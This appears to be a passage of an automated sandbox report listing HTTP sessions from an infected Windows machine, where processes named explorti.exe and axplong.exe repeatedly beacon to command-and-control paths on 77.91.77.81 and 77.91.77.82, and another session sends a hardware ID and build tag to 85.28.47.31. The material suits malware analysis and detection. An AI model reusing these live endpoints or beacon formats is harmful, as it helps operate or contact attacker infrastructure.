                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        52192.168.2.64988377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:35.833962917 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:36.550163984 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:36.551970959 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:36.788646936 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        53192.168.2.64989077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:36.518018007 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:37.274267912 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:37.274828911 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:37.505661964 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        54192.168.2.64989185.28.47.3180
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:36.524269104 CEST86OUTGET / HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:37.199963093 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:15:37.215755939 CEST409OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 211
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a
                                                                                        Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="build"sila------FCBFBGDBKJKECAAKKFHD--
                                                                                        Jul 24, 2024 07:15:37.409615040 CEST210INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 8
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                        Data Ascii: YmxvY2s=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        55192.168.2.64989477.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:36.898477077 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:37.606465101 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:37.618225098 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:37.928138971 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:15:38.403844118 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0
                                                                                        Jul 24, 2024 07:15:38.418793917 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        56192.168.2.64989577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:37.935060024 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:39.411604881 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:39.412396908 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:39.938179970 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        57192.168.2.64989677.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:38.425020933 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:39.411623001 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:39.412357092 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:39.422164917 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:39.724064112 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:39.934197903 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        58192.168.2.64989877.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:40.078965902 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:40.809779882 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:40.810503960 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:41.057312965 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        59192.168.2.64989977.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:40.078974009 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:40.827265978 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:40.827850103 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:41.059663057 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        60192.168.2.64990077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:41.183039904 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:41.935612917 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:41.936615944 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:42.167968988 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        61192.168.2.64990177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:41.183145046 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:41.939054966 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:41.940047979 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:42.177021027 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
